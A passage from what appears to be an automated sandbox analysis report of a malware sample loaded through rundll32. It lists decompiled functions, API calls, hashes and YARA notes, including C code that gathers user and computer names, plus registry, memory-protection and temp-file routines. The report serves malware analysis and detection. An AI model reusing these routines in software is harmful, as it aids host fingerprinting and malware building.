                                                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0627DEA3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                                                          • String ID:
                                                          • API String ID: 3204852930-0
                                                          • Opcode ID: 062068f952ffa9b52f02c67a21e822200780c6c421626dfe675db36460f31225
                                                          • Instruction ID: 94ea765ac372ee6904c716fec7f62fcb498a72df170ad974d4d82a73eb7dbae4
                                                          • Opcode Fuzzy Hash: 062068f952ffa9b52f02c67a21e822200780c6c421626dfe675db36460f31225
                                                          • Instruction Fuzzy Hash: 24311B72D1020EAFDF529F65CC84DAEBBB9EF58244F044869ED14A7211E731DA54CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06281ECD Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 062870C3: RtlEnterCriticalSection.NTDLL(0629A428), ref: 062870CB
                                                            • Part of subcall function 062870C3: RtlLeaveCriticalSection.NTDLL(0629A428), ref: 062870E0
                                                            • Part of subcall function 062870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 062870F9
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 06281F04
                                                          • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,06288667,?,00000000), ref: 06281F15
                                                          • lstrcmpi.KERNEL32(00000002,?), ref: 06281F5B
                                                          • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,06288667,?,00000000), ref: 06281F6F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,06288667,?,00000000), ref: 06281FB5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                                          • String ID:
                                                          • API String ID: 733514052-0
                                                          • Opcode ID: 1461ad55ac6a64f44fb9dcd60d48c96b08a195a3d4ed8a7fcdaecf2b83fb877d
                                                          • Instruction ID: 4514807d797fad02b2b19af4be758f622adc590d3e9c9f18b6d836566d92d832
                                                          • Opcode Fuzzy Hash: 1461ad55ac6a64f44fb9dcd60d48c96b08a195a3d4ed8a7fcdaecf2b83fb877d
                                                          • Instruction Fuzzy Hash: 9C31D471A1030AAFDB50AFA8EC88A9E7BB9FF54254F104024FD04A7280D3348D55CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D2A11 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D2A11() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x75bcc742
						_v12 = _v12 + _t11;
						_t64 = E036D6D63(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E036D6C2C(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x36d57e9
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                          0x036d2a1f
                                                          0x036d2a22
                                                          0x036d2a25
                                                          0x036d2a2b
                                                          0x036d2a30
                                                          0x036d2a36
                                                          0x036d2a3e
                                                          0x036d2a41
                                                          0x036d2a47
                                                          0x036d2a4c
                                                          0x036d2a55
                                                          0x036d2a59
                                                          0x036d2a66
                                                          0x036d2a6a
                                                          0x036d2a6c
                                                          0x036d2a70
                                                          0x036d2a73
                                                          0x036d2a83
                                                          0x036d2ad6
                                                          0x036d2ad7
                                                          0x036d2a85
                                                          0x036d2a8a
                                                          0x036d2a8b
                                                          0x036d2a90
                                                          0x036d2a93
                                                          0x036d2aa6
                                                          0x00000000
                                                          0x036d2aa8
                                                          0x036d2aab
                                                          0x036d2ab0
                                                          0x036d2abe
                                                          0x036d2ac1
                                                          0x036d2ac7
                                                          0x036d2acc
                                                          0x00000000
                                                          0x036d2ace
                                                          0x036d2ace
                                                          0x036d2ad1
                                                          0x036d2ad1
                                                          0x036d2acc
                                                          0x036d2aa6
                                                          0x036d2adc
                                                          0x036d2add
                                                          0x036d2a4c
                                                          0x036d2ae3

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,036D57E7), ref: 036D2A25
                                                          • GetComputerNameW.KERNEL32(00000000,036D57E7), ref: 036D2A41
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • GetUserNameW.ADVAPI32(00000000,036D57E7), ref: 036D2A7B
                                                          • GetComputerNameW.KERNEL32(036D57E7,75BCC740), ref: 036D2A9E
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,036D57E7,00000000,036D57E9,00000000,00000000,?,75BCC740,036D57E7), ref: 036D2AC1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 1c63a9c10bafb6b447123e1b2bddd26c86deb831d06e09628136acdb79756529
                                                          • Instruction ID: 95b763c0ebed9c2e0ffbc3b979c5e9c083cc6b03de4efe86e70971c3f72f38ef
                                                          • Opcode Fuzzy Hash: 1c63a9c10bafb6b447123e1b2bddd26c86deb831d06e09628136acdb79756529
                                                          • Instruction Fuzzy Hash: 2521D676D00208FFCB21DFE9DA849AEBBB8FF44200B5444AAE901E7244E7709B45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627242A Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0627243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0628D58C
                                                          • RtlEnterCriticalSection.NTDLL(0629A428), ref: 06272454
                                                          • RtlLeaveCriticalSection.NTDLL(0629A428), ref: 06272467
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 06272478
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 062724E3
                                                          • InterlockedIncrement.KERNEL32(0629A43C), ref: 062724FA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                                          • String ID:
                                                          • API String ID: 3915436794-0
                                                          • Opcode ID: 8e65d5f51bc75022530238e3c7a18de895ed12d82c00d7f0e26bef6bd017ed84
                                                          • Instruction ID: 9b607d155c6d47f9280f31dff01ae7647150adc246e012fc4e31a0e40262fd47
                                                          • Opcode Fuzzy Hash: 8e65d5f51bc75022530238e3c7a18de895ed12d82c00d7f0e26bef6bd017ed84
                                                          • Instruction Fuzzy Hash: 0331BF31A22302DFC765CF28E858E2AB7E5FB88325B004919FD5983250DB34DA15CFE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06288327 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0628833B
                                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 06288357
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • GetUserNameW.ADVAPI32(76CC81D0,76C85520), ref: 06288391
                                                          • GetComputerNameW.KERNEL32(?,?), ref: 062883B4
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 062883D7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 4afb381c433e092e699d2983a1b776e91806830a45de380d640ebb1c27de14e3
                                                          • Instruction ID: d63135b8d3115ae10188a5a564c0a592310489684fd322f4f2d52bd95590a759
                                                          • Opcode Fuzzy Hash: 4afb381c433e092e699d2983a1b776e91806830a45de380d640ebb1c27de14e3
                                                          • Instruction Fuzzy Hash: B321FB76D11209FFDB11DFE8D9888EEBBBDEF48200B5044AAE601E7240D6349B45CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627306D Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                          • DeleteFileA.KERNEL32(00000000,000004D2), ref: 06273090
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 06273099
                                                          • GetLastError.KERNEL32 ref: 062730A3
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06273162
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 3543646443-0
                                                          • Opcode ID: 25dc25c0cc1d1ac6783e44612ce2f3b6b7dd9526dfe280dc25081ee668a7f341
                                                          • Instruction ID: 8f31deb780e551cead8f30f82b7c5ccd35faae6ea1d86492990ed405685acc68
                                                          • Opcode Fuzzy Hash: 25dc25c0cc1d1ac6783e44612ce2f3b6b7dd9526dfe280dc25081ee668a7f341
                                                          • Instruction Fuzzy Hash: 1621FFB2612310AFC790BBA9FC5CE8A379DAF8A211B040411FB15DB281D638E514CFF9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06282F4E Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06281C19: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0627E231,00000000,76CDF5B0,06280348,?,00000001), ref: 06281C25
                                                            • Part of subcall function 06281C19: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 06281C3B
                                                            • Part of subcall function 06281C19: _snwprintf.NTDLL ref: 06281C60
                                                            • Part of subcall function 06281C19: CreateFileMappingW.KERNEL32(000000FF,0629A1E8,00000004,00000000,00001000,?), ref: 06281C7C
                                                            • Part of subcall function 06281C19: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 06281C8E
                                                            • Part of subcall function 06281C19: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 06281CC6
                                                          • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0627E231,00000000,76CDF5B0,06280348,?,00000001), ref: 06282F89
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06282F92
                                                          • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0627E231,00000000,76CDF5B0,06280348,?,00000001), ref: 06282FD9
                                                          • GetLastError.KERNEL32(06283959,00000000,00000000,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06283008
                                                          • CloseHandle.KERNEL32(00000000,06283959,00000000,00000000,?,?,?,?,?,?,?,06279100,?), ref: 06283018
                                                            • Part of subcall function 0627C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0627171E,?,?,00000000,?), ref: 0627C2B6
                                                            • Part of subcall function 0627C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0627171E,?,?,00000000,?), ref: 0627C2DE
                                                            • Part of subcall function 0627C2AA: memset.NTDLL ref: 0627C2F0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 1106445334-0
                                                          • Opcode ID: b9681def0ca6d0fd96163dd1fd355421d0ff033f221503a628d77b4384449bfb
                                                          • Instruction ID: 4a5317b8e5f481a805cf49eb398e1947950565b4d9e5fd50c6ddc8cbf7b08c46
                                                          • Opcode Fuzzy Hash: b9681def0ca6d0fd96163dd1fd355421d0ff033f221503a628d77b4384449bfb
                                                          • Instruction Fuzzy Hash: 8C21C931A26306EFDB91BFB5EC08B5A77AAEF54750B040528EE11D3190DB31E941DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628A651 Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0627148A,?,?,?), ref: 0628A66F
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,0627148A,?,?,?), ref: 0628A67F
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,0627148A,?,?,?), ref: 0628A6AB
                                                          • GetLastError.KERNEL32(?,?,0627148A,?,?,?), ref: 0628A6D0
                                                          • CloseHandle.KERNEL32(000000FF,?,?,0627148A,?,?,?), ref: 0628A6E1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateErrorHandleLastReadSize
                                                          • String ID:
                                                          • API String ID: 3577853679-0
                                                          • Opcode ID: 92c7b5573eb24d80e4a8ab4be420bd4e18a6f9c66c9c38a6c6cc2c663143e534
                                                          • Instruction ID: 7899e9865ac741cbaf40784ca4ea3df5ec24bae84f89b396e2b54b84efdea8c1
                                                          • Opcode Fuzzy Hash: 92c7b5573eb24d80e4a8ab4be420bd4e18a6f9c66c9c38a6c6cc2c663143e534
                                                          • Instruction Fuzzy Hash: 92112432611226AFDF612F6DDC8CAAE7B69EB442A4F010126FD15A71C0DA71AC40DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062775D8 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,062887C2,?,?,?,00000000,00000001,00000000,?), ref: 062775E9
                                                          • StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,6E2AA0A7,6E2AA0A7,?,062887C2,?,?,?,00000000,00000001,00000000,?), ref: 06277602
                                                          • StrTrimA.SHLWAPI(?,?,?,00000000,6E2AA0A7,6E2AA0A7,?,062887C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 0627762A
                                                          • StrTrimA.SHLWAPI(00000000,?,?,00000000,6E2AA0A7,6E2AA0A7,?,062887C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 06277639
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,062887C2,?,?,?), ref: 06277670
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Trim$FreeHeap
                                                          • String ID:
                                                          • API String ID: 2132463267-0
                                                          • Opcode ID: 7dea62e7b9d2466fe5f487180da2929aa9fdf33bf9aed577d08657171787dbc8
                                                          • Instruction ID: 5f219e481b984180c82654833da5da214d6551d6ab3818ec42515e68eba085d8
                                                          • Opcode Fuzzy Hash: 7dea62e7b9d2466fe5f487180da2929aa9fdf33bf9aed577d08657171787dbc8
                                                          • Instruction Fuzzy Hash: 3A119032610707BFD7119A6DEC89F9B7BADDB88694F040021BE09DB285EA70D9018BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628389D Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,005FD5A8,?,?,00000000,00000000,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C), ref: 062838D4
                                                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 06283904
                                                          • RtlEnterCriticalSection.NTDLL(0629A400), ref: 06283913
                                                          • RtlLeaveCriticalSection.NTDLL(0629A400), ref: 06283931
                                                          • GetLastError.KERNEL32(?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 06283941
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                          • String ID:
                                                          • API String ID: 653387826-0
                                                          • Opcode ID: 146c26975d0a2c69ec3a3e98d2921b94d367006fc6c50582d2cb3c1348a7cf75
                                                          • Instruction ID: e2b8b80ba4e37babc0e890d75d5c3fd9d2e896a0fc55642444b63208083c124d
                                                          • Opcode Fuzzy Hash: 146c26975d0a2c69ec3a3e98d2921b94d367006fc6c50582d2cb3c1348a7cf75
                                                          • Instruction Fuzzy Hash: 682138B5610B02EFD751DFA8D984A4ABBF8FF08714B008629EA5AD3750D770E944CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06283775 Relevance: 7.6, APIs: 5, Instructions: 67memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0629A06C), ref: 06283785
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000001,00000191), ref: 062837DC
                                                          • InterlockedDecrement.KERNEL32(0629A06C), ref: 062837F1
                                                          • DeleteFileA.KERNEL32(00000000), ref: 0628380F
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628381D
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                            • Part of subcall function 0627A316: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0627A391
                                                            • Part of subcall function 0627A316: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0627A3BD
                                                            • Part of subcall function 0627A316: _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0627A3CD
                                                            • Part of subcall function 0627A316: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0627A405
                                                            • Part of subcall function 0627A316: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0627A427
                                                            • Part of subcall function 0627A316: GetShellWindow.USER32 ref: 0627A436
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileTempTimerWaitable$FreeHeapInterlockedPathTime$CreateCurrentDecrementDeleteIncrementMultipleNameObjectsShellSystemThreadWaitWindow_allmullstrcpy
                                                          • String ID:
                                                          • API String ID: 1587453479-0
                                                          • Opcode ID: 2f3a03e2de3c56f34dac58d431f8f70aa220a9f7cd157de1f20c175c3bed942e
                                                          • Instruction ID: fcf43b2d35d38cfb97b0f4cf245c0c5a34bf6539163bad984d3bb6bc4dc50028
                                                          • Opcode Fuzzy Hash: 2f3a03e2de3c56f34dac58d431f8f70aa220a9f7cd157de1f20c175c3bed942e
                                                          • Instruction Fuzzy Hash: C2119375620309FFDB42AFA4DC85EAE3E7DEB88794F104025FE05AA140D7B5C980DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06287408 Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 06287436
                                                          • GetLastError.KERNEL32 ref: 06287459
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0628746C
                                                          • GetLastError.KERNEL32 ref: 06287477
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 062874BF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1671499436-0
                                                          • Opcode ID: bd15c0aae348d7066fbc804767c087409504556f2a33bac7dbeaf13e43028ac6
                                                          • Instruction ID: 8100b0434af140d67a241b193aceaf9f25a6888e7eade9a4b6b407f9eea0582a
                                                          • Opcode Fuzzy Hash: bd15c0aae348d7066fbc804767c087409504556f2a33bac7dbeaf13e43028ac6
                                                          • Instruction Fuzzy Hash: E121C230A20305AFEB61AF50ED8DF5D7FBAEBC1318F300414EA42950E0D7749984DB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062726D3 Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 062726E7
                                                          • memcpy.NTDLL(00000000,?,?,?), ref: 06272710
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 06272739
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 06272759
                                                          • RegCloseKey.ADVAPI32(?), ref: 06272764
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$AllocateCloseCreateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2954810647-0
                                                          • Opcode ID: 68f71b66f187e1c9034e3e7d91200579cd7c09c9a02c8cccb39afc6f85489127
                                                          • Instruction ID: f1984154f5f68db942d8d88c97f432cd76b2a4ba92f2270d1a37e2393225a4c7
                                                          • Opcode Fuzzy Hash: 68f71b66f187e1c9034e3e7d91200579cd7c09c9a02c8cccb39afc6f85489127
                                                          • Instruction Fuzzy Hash: D811CA32910205FFDF516E54ED88EAE777DEF44351F044025FE01A6190D6718D50DB71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627E57D Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(0627980C,?,?,?,?,00000008,0627980C,00000000,?), ref: 0627E59A
                                                          • memcpy.NTDLL(0627980C,?,00000009,?,?,?,?,00000008,0627980C,00000000,?), ref: 0627E5BC
                                                          • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 0627E5D4
                                                          • lstrlenW.KERNEL32(00000000,00000001,0627980C,?,?,?,?,?,?,?,00000008,0627980C,00000000,?), ref: 0627E5F4
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000008,0627980C,00000000,?), ref: 0627E619
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3065863707-0
                                                          • Opcode ID: 6263507036f8939742462d7dcd370afe7bf2b31385f1d3a6e87d913e50889c5e
                                                          • Instruction ID: 06cca986146bdaed4c4f7f06cacb906b79549584578ace593dfbb7f001f14bb8
                                                          • Opcode Fuzzy Hash: 6263507036f8939742462d7dcd370afe7bf2b31385f1d3a6e87d913e50889c5e
                                                          • Instruction Fuzzy Hash: 66115E75E01309BBCB619BA5EC0DF8E7BB9AB48354F008051FA59E6280E6749648CBB0
                                                          Uniqueness

